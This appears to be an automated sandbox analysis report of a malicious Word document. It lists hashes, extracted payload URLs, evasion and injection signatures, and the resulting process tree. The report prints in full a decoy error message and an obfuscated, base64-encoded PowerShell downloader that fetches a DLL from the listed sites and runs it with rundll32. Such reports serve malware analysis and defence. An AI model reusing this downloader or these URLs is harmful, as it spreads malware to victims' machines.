Analysis
-
max time kernel
139s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
14-01-2021 10:26
Behavioral task
behavioral1
Sample
Attachments_276.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Attachments_276.doc
Resource
win10v20201028
General
-
Target
Attachments_276.doc
-
Size
162KB
-
MD5
1e36711be581dee9f77ef2243b2a6048
-
SHA1
d446161ee0af2b40768c72ad7b9159a9e81d655a
-
SHA256
a8b8fb73b3d7ae7a1780ae143dbfb66471afacb86c69e3270e026e8f11281918
-
SHA512
363b2265fed1b89396e8fa9c928fa3b754b3fe2afde0aadd1ffe4005524ea25bb39c6e4ea516c2b13cae8587d0eea4572f020d4344ab73f72536e66bb5f20c25
Malware Config
Extracted
http://www.mitraship.com/wp-content/ZKeB/
http://djsrecord.com/wp-includes/abop/
https://lastfrontierstrekking.com/new/2OaabFU/
https://watchnshirt.com/y/L7z9YcA/
https://www.impipower.com/wp-content/U/
https://www.inkayniperutours.com/druver/LtcG/
https://vysimopoulos.com/d/NF/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3004 4244 cmd.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exerundll32.exeflow pid process 20 636 powershell.exe 28 3040 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1816 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Icumj\itik.iwq rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4688 WINWORD.EXE 4688 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exerundll32.exepid process 636 powershell.exe 636 powershell.exe 636 powershell.exe 3040 rundll32.exe 3040 rundll32.exe 3040 rundll32.exe 3040 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 636 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4688 WINWORD.EXE 4688 WINWORD.EXE 4688 WINWORD.EXE 4688 WINWORD.EXE 4688 WINWORD.EXE 4688 WINWORD.EXE 4688 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 3004 wrote to memory of 2128 3004 cmd.exe msg.exe PID 3004 wrote to memory of 2128 3004 cmd.exe msg.exe PID 3004 wrote to memory of 636 3004 cmd.exe powershell.exe PID 3004 wrote to memory of 636 3004 cmd.exe powershell.exe PID 636 wrote to memory of 1684 636 powershell.exe rundll32.exe PID 636 wrote to memory of 1684 636 powershell.exe rundll32.exe PID 1684 wrote to memory of 1816 1684 rundll32.exe rundll32.exe PID 1684 wrote to memory of 1816 1684 rundll32.exe rundll32.exe PID 1684 wrote to memory of 1816 1684 rundll32.exe rundll32.exe PID 1816 wrote to memory of 3040 1816 rundll32.exe rundll32.exe PID 1816 wrote to memory of 3040 1816 rundll32.exe rundll32.exe PID 1816 wrote to memory of 3040 1816 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Attachments_276.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAFMARQB0ACAAKAAiAHgAawAiACsAIgBxAG0AIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIALQBGACcAWQAnACwAJwBzACcALAAnAFMAVABFAG0ALgBpAG8ALgAnACwAJwBkAEkAcgBFAGMAVABPAHIAWQAnACkAIAAgACkAOwAgACAAIAAgAFMAZQBUAC0AVgBhAHIASQBhAGIAbABFACAAIABFADMAagB2AEEATQAgACgAIABbAFQAWQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAgAC0ARgAnAEUAcABvAGkAbgBUACcALAAnAHMAeQBzAFQAZQBNAC4AbgBlAFQALgBTAEUAcgB2AGkAJwAsACcAZQAnACwAJwBDACcALAAnAFIAJwAsACcAbQBBAE4AYQBHACcAKQAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAdABsAHkAQwAnACsAJwBvACcAKQArACcAbgB0ACcAKwAoACcAaQAnACsAJwBuAHUAJwApACsAJwBlACcAKQA7ACQAUQB6AGgAeABoADMAMAA9ACQASAAwADIAVgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA4ADYATwA7ACQAQwAxADkATwA9ACgAJwBaACcAKwAoACcAMAAnACsAJwBfAE8AJwApACkAOwAgACgAIAAgAEcARQB0AC0AVgBhAHIASQBBAEIATABlACAAIAAoACIAeABLACIAKwAiAFEATQAiACkAIAAtAFYAYQBMACkAOgA6ACIAQwBSAGAAZQBgAEEAVABgAGUARABJAFIAZQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAnAE4AeQBwADIAYgB2AGkAewAwAH0ATQA1ACcAKwAnAHIAZwAnACsAKAAnAHYANQAnACsAJwBuACcAKQArACcAewAwAH0AJwApACAAIAAtAEYAWwBjAEgAYQByAF0AOQAyACkAKQA7ACQASgA2ADIAUQA9ACgAJwBVACcAKwAoACcANwA0ACcAKwAnAFgAJwApACkAOwAgACgAIABHAGUAVAAtAFYAYQBSAGkAYQBCAEwARQAgAEUAMwBqAFYAYQBNACAAIAAtAHYAQQBsACAAKQA6ADoAIgBTAEUAYwB1AFIAaQBgAFQAYABZAHAAcgBgAG8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFEAOQA0AFIAPQAoACgAJwBIADcAJwArACcAMgAnACkAKwAnAE4AJwApADsAJABGAGkAbwBjAGQAbgBhACAAPQAgACgAKAAnAFoAJwArACcAXwAzACcAKQArACcAVgAnACkAOwAkAEUAMABfAFAAPQAoACgAJwBIACcAKwAnADcAMwAnACkAKwAnAEgAJwApADsAJABVADUAdQBjADIANABqAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATgB5AHAAMgBiAHYAaQB7ADAAfQBNADUAcgBnACcAKwAnAHYANQAnACsAJwBuACcAKwAnAHsAMAB9ACcAKQAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQARgBpAG8AYwBkAG4AYQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVAA5ADYAVgA9ACgAKAAnAEMANQAnACsAJwA3ACcAKQArACcAUwAnACkAOwAkAEkAdQBjAG0AZABxADIAPQAoACcAdwAnACsAKAAnAF0AeABtAFsAdgA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAdwAnACsAJwB3AHcAJwApACsAKAAnAC4AbQAnACsAJwBpAHQAJwArACcAcgAnACsAJwBhAHMAaABpAHAALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvAFoASwBlAEIAJwArACcALwAnACkAKwAnAEAAJwArACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbAHYAOgAvAC8AJwArACcAZAAnACsAJwBqAHMAcgAnACkAKwAoACcAZQBjACcAKwAnAG8AcgAnACkAKwAoACcAZAAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AaQBuAGMAbAB1ACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcALwBhAGIAJwArACcAbwBwAC8AJwApACsAJwBAAHcAJwArACgAJwBdAHgAJwArACcAbQBbAHYAJwApACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbAAnACkAKwAoACcAYQBzACcAKwAnAHQAZgAnACsAJwByAG8AbgAnACkAKwAoACcAdABpAGUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AHIAJwArACcAZQBrAGsAJwApACsAKAAnAGkAbgAnACsAJwBnACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAG4AZQB3AC8AMgBPAGEAJwArACcAYQAnACkAKwAoACcAYgBGAFUAJwArACcALwBAAHcAXQB4ACcAKQArACgAJwBtAFsAdgBzADoALwAvAHcAYQB0AGMAJwArACcAaABuAHMAJwArACcAaABpACcAKwAnAHIAJwArACcAdAAuAGMAbwBtAC8AeQAnACsAJwAvACcAKwAnAEwANwB6ADkAWQBjACcAKwAnAEEALwBAACcAKwAnAHcAXQB4ACcAKwAnAG0AJwApACsAKAAnAFsAdgAnACsAJwBzADoALwAnACkAKwAnAC8AdwAnACsAKAAnAHcAdwAnACsAJwAuAGkAJwApACsAKAAnAG0AcAAnACsAJwBpAHAAJwArACcAbwAnACsAJwB3ACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AJwApACsAJwBjACcAKwAnAG8AJwArACgAJwBuAHQAZQBuAHQAJwArACcALwBVACcAKQArACcALwBAACcAKwAoACcAdwBdAHgAbQBbAHYAJwArACcAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgAnACsAJwBpACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAYQB5AG4AaQAnACkAKwAoACcAcABlAHIAdQB0ACcAKwAnAG8AJwArACcAdQByAHMALgBjAG8AJwArACcAbQAvAGQAJwApACsAKAAnAHIAJwArACcAdQB2AGUAJwArACcAcgAvACcAKwAnAEwAdABjAEcAJwApACsAKAAnAC8AQAB3ACcAKwAnAF0AeAAnACsAJwBtAFsAJwApACsAKAAnAHYAJwArACcAcwA6ACcAKQArACgAJwAvAC8AdgB5ACcAKwAnAHMAaQAnACkAKwAoACcAbQBvAHAAJwArACcAbwB1AGwAJwArACcAbwBzAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AZAAvAE4AJwArACcARgAvACcAKQApAC4AIgBSAGAAZQBQAEwAYABBAEMAZQAiACgAKAAnAHcAXQAnACsAKAAnAHgAbQAnACsAJwBbACcAKQArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABIADkAMgBHACAAKwAgACQAUQB6AGgAeABoADMAMAAgACsAIAAkAEoAOQA1AFMAKQA7ACQATAA0ADQARQA9ACgAJwBZADgAJwArACcAOABLACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwB1AHEAMgAyAF8AaAAgAGkAbgAgACQASQB1AGMAbQBkAHEAMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAHMAdABFAG0ALgBuAGUAVAAuAHcARQBCAGMATABpAGUAbgBUACkALgAiAGQATwB3AE4AbABgAG8AYABBAGQARgBgAGkAbABlACIAKAAkAFcAdQBxADIAMgBfAGgALAAgACQAVQA1AHUAYwAyADQAagApADsAJABBADcAMQBOAD0AKAAoACcATwAnACsAJwAyADQAJwApACsAJwBGACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABVADUAdQBjADIANABqACkALgAiAEwARQBOAGAAZwB0AGgAIgAgAC0AZwBlACAANAA1ADEANAA5ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAFUANQB1AGMAMgA0AGoALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEAGkAJwArACcAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAVABPAGAAUwB0AHIAaQBOAEcAIgAoACkAOwAkAEkANgAzAEUAPQAoACgAJwBTACcAKwAnADgAOAAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABFADcAMgBTAD0AKAAnAEsANAAnACsAJwBfAEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBPAD0AKAAoACcAVAAnACsAJwA3ADgAJwApACsAJwBKACcAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD IAAgAFMARQB0ACAAKAAiAHgAawAiACsAIgBxAG0AIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ACIALQBGACcAWQAnACwAJwBzACcALAAnAFMAVABFAG0ALgBpAG8ALgAnACwAJwBkAEkAcgBFAGMAVABPAHIAWQAnACkAIAAgACkAOwAgACAAIAAgAFMAZQBUAC0AVgBhAHIASQBhAGIAbABFACAAIABFADMAagB2AEEATQAgACgAIABbAFQAWQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAgAC0ARgAnAEUAcABvAGkAbgBUACcALAAnAHMAeQBzAFQAZQBNAC4AbgBlAFQALgBTAEUAcgB2AGkAJwAsACcAZQAnACwAJwBDACcALAAnAFIAJwAsACcAbQBBAE4AYQBHACcAKQAgACkAIAAgADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAdABsAHkAQwAnACsAJwBvACcAKQArACcAbgB0ACcAKwAoACcAaQAnACsAJwBuAHUAJwApACsAJwBlACcAKQA7ACQAUQB6AGgAeABoADMAMAA9ACQASAAwADIAVgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA4ADYATwA7ACQAQwAxADkATwA9ACgAJwBaACcAKwAoACcAMAAnACsAJwBfAE8AJwApACkAOwAgACgAIAAgAEcARQB0AC0AVgBhAHIASQBBAEIATABlACAAIAAoACIAeABLACIAKwAiAFEATQAiACkAIAAtAFYAYQBMACkAOgA6ACIAQwBSAGAAZQBgAEEAVABgAGUARABJAFIAZQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAnAE4AeQBwADIAYgB2AGkAewAwAH0ATQA1ACcAKwAnAHIAZwAnACsAKAAnAHYANQAnACsAJwBuACcAKQArACcAewAwAH0AJwApACAAIAAtAEYAWwBjAEgAYQByAF0AOQAyACkAKQA7ACQASgA2ADIAUQA9ACgAJwBVACcAKwAoACcANwA0ACcAKwAnAFgAJwApACkAOwAgACgAIABHAGUAVAAtAFYAYQBSAGkAYQBCAEwARQAgAEUAMwBqAFYAYQBNACAAIAAtAHYAQQBsACAAKQA6ADoAIgBTAEUAYwB1AFIAaQBgAFQAYABZAHAAcgBgAG8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAFEAOQA0AFIAPQAoACgAJwBIADcAJwArACcAMgAnACkAKwAnAE4AJwApADsAJABGAGkAbwBjAGQAbgBhACAAPQAgACgAKAAnAFoAJwArACcAXwAzACcAKQArACcAVgAnACkAOwAkAEUAMABfAFAAPQAoACgAJwBIACcAKwAnADcAMwAnACkAKwAnAEgAJwApADsAJABVADUAdQBjADIANABqAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACcATgB5AHAAMgBiAHYAaQB7ADAAfQBNADUAcgBnACcAKwAnAHYANQAnACsAJwBuACcAKwAnAHsAMAB9ACcAKQAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQARgBpAG8AYwBkAG4AYQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVAA5ADYAVgA9ACgAKAAnAEMANQAnACsAJwA3ACcAKQArACcAUwAnACkAOwAkAEkAdQBjAG0AZABxADIAPQAoACcAdwAnACsAKAAnAF0AeABtAFsAdgA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAdwAnACsAJwB3AHcAJwApACsAKAAnAC4AbQAnACsAJwBpAHQAJwArACcAcgAnACsAJwBhAHMAaABpAHAALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdAAvAFoASwBlAEIAJwArACcALwAnACkAKwAnAEAAJwArACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbAHYAOgAvAC8AJwArACcAZAAnACsAJwBqAHMAcgAnACkAKwAoACcAZQBjACcAKwAnAG8AcgAnACkAKwAoACcAZAAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AaQBuAGMAbAB1ACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcALwBhAGIAJwArACcAbwBwAC8AJwApACsAJwBAAHcAJwArACgAJwBdAHgAJwArACcAbQBbAHYAJwApACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbAAnACkAKwAoACcAYQBzACcAKwAnAHQAZgAnACsAJwByAG8AbgAnACkAKwAoACcAdABpAGUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AHIAJwArACcAZQBrAGsAJwApACsAKAAnAGkAbgAnACsAJwBnACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAG4AZQB3AC8AMgBPAGEAJwArACcAYQAnACkAKwAoACcAYgBGAFUAJwArACcALwBAAHcAXQB4ACcAKQArACgAJwBtAFsAdgBzADoALwAvAHcAYQB0AGMAJwArACcAaABuAHMAJwArACcAaABpACcAKwAnAHIAJwArACcAdAAuAGMAbwBtAC8AeQAnACsAJwAvACcAKwAnAEwANwB6ADkAWQBjACcAKwAnAEEALwBAACcAKwAnAHcAXQB4ACcAKwAnAG0AJwApACsAKAAnAFsAdgAnACsAJwBzADoALwAnACkAKwAnAC8AdwAnACsAKAAnAHcAdwAnACsAJwAuAGkAJwApACsAKAAnAG0AcAAnACsAJwBpAHAAJwArACcAbwAnACsAJwB3ACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AJwApACsAJwBjACcAKwAnAG8AJwArACgAJwBuAHQAZQBuAHQAJwArACcALwBVACcAKQArACcALwBAACcAKwAoACcAdwBdAHgAbQBbAHYAJwArACcAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgAnACsAJwBpACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAYQB5AG4AaQAnACkAKwAoACcAcABlAHIAdQB0ACcAKwAnAG8AJwArACcAdQByAHMALgBjAG8AJwArACcAbQAvAGQAJwApACsAKAAnAHIAJwArACcAdQB2AGUAJwArACcAcgAvACcAKwAnAEwAdABjAEcAJwApACsAKAAnAC8AQAB3ACcAKwAnAF0AeAAnACsAJwBtAFsAJwApACsAKAAnAHYAJwArACcAcwA6ACcAKQArACgAJwAvAC8AdgB5ACcAKwAnAHMAaQAnACkAKwAoACcAbQBvAHAAJwArACcAbwB1AGwAJwArACcAbwBzAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AZAAvAE4AJwArACcARgAvACcAKQApAC4AIgBSAGAAZQBQAEwAYABBAEMAZQAiACgAKAAnAHcAXQAnACsAKAAnAHgAbQAnACsAJwBbACcAKQArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABIADkAMgBHACAAKwAgACQAUQB6AGgAeABoADMAMAAgACsAIAAkAEoAOQA1AFMAKQA7ACQATAA0ADQARQA9ACgAJwBZADgAJwArACcAOABLACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwB1AHEAMgAyAF8AaAAgAGkAbgAgACQASQB1AGMAbQBkAHEAMgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAHMAdABFAG0ALgBuAGUAVAAuAHcARQBCAGMATABpAGUAbgBUACkALgAiAGQATwB3AE4AbABgAG8AYABBAGQARgBgAGkAbABlACIAKAAkAFcAdQBxADIAMgBfAGgALAAgACQAVQA1AHUAYwAyADQAagApADsAJABBADcAMQBOAD0AKAAoACcATwAnACsAJwAyADQAJwApACsAJwBGACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABVADUAdQBjADIANABqACkALgAiAEwARQBOAGAAZwB0AGgAIgAgAC0AZwBlACAANAA1ADEANAA5ACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAFUANQB1AGMAMgA0AGoALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEAGkAJwArACcAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAVABPAGAAUwB0AHIAaQBOAEcAIgAoACkAOwAkAEkANgAzAEUAPQAoACgAJwBTACcAKwAnADgAOAAnACkAKwAnAEMAJwApADsAYgByAGUAYQBrADsAJABFADcAMgBTAD0AKAAnAEsANAAnACsAJwBfAEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBPAD0AKAAoACcAVAAnACsAJwA3ADgAJwApACsAJwBKACcAKQA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll,ShowDialogA3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dll,ShowDialogA4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Icumj\itik.iwq",ShowDialogA5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dllMD5
86772e700ec8cdee691928f00e4cca8e
SHA13e9d1e42467fd93339d3bba4b4cb512c375883f7
SHA256ddbfedb21cb6b4cffaf94cb55322a5f487b6c1830bf526f50ace97be052b73bf
SHA5121a63c12a6cb3b40e474b6b696e72ace6300fa8c2c23c5ed599e1f461f3053b3de4739e78dcf9f36c547d64d975326bc6db78c3e9855370b98d8b8d2998dbafb5
-
\Users\Admin\Nyp2bvi\M5rgv5n\Z_3V.dllMD5
86772e700ec8cdee691928f00e4cca8e
SHA13e9d1e42467fd93339d3bba4b4cb512c375883f7
SHA256ddbfedb21cb6b4cffaf94cb55322a5f487b6c1830bf526f50ace97be052b73bf
SHA5121a63c12a6cb3b40e474b6b696e72ace6300fa8c2c23c5ed599e1f461f3053b3de4739e78dcf9f36c547d64d975326bc6db78c3e9855370b98d8b8d2998dbafb5
-
memory/636-4-0x0000000000000000-mapping.dmp
-
memory/636-5-0x00007FFCE6BE0000-0x00007FFCE75CC000-memory.dmpFilesize
9.9MB
-
memory/636-6-0x000002829A250000-0x000002829A251000-memory.dmpFilesize
4KB
-
memory/636-7-0x00000282B2550000-0x00000282B2551000-memory.dmpFilesize
4KB
-
memory/1684-8-0x0000000000000000-mapping.dmp
-
memory/1816-10-0x0000000000000000-mapping.dmp
-
memory/2128-3-0x0000000000000000-mapping.dmp
-
memory/3040-12-0x0000000000000000-mapping.dmp
-
memory/4688-2-0x00007FFCEDB30000-0x00007FFCEE167000-memory.dmpFilesize
6.2MB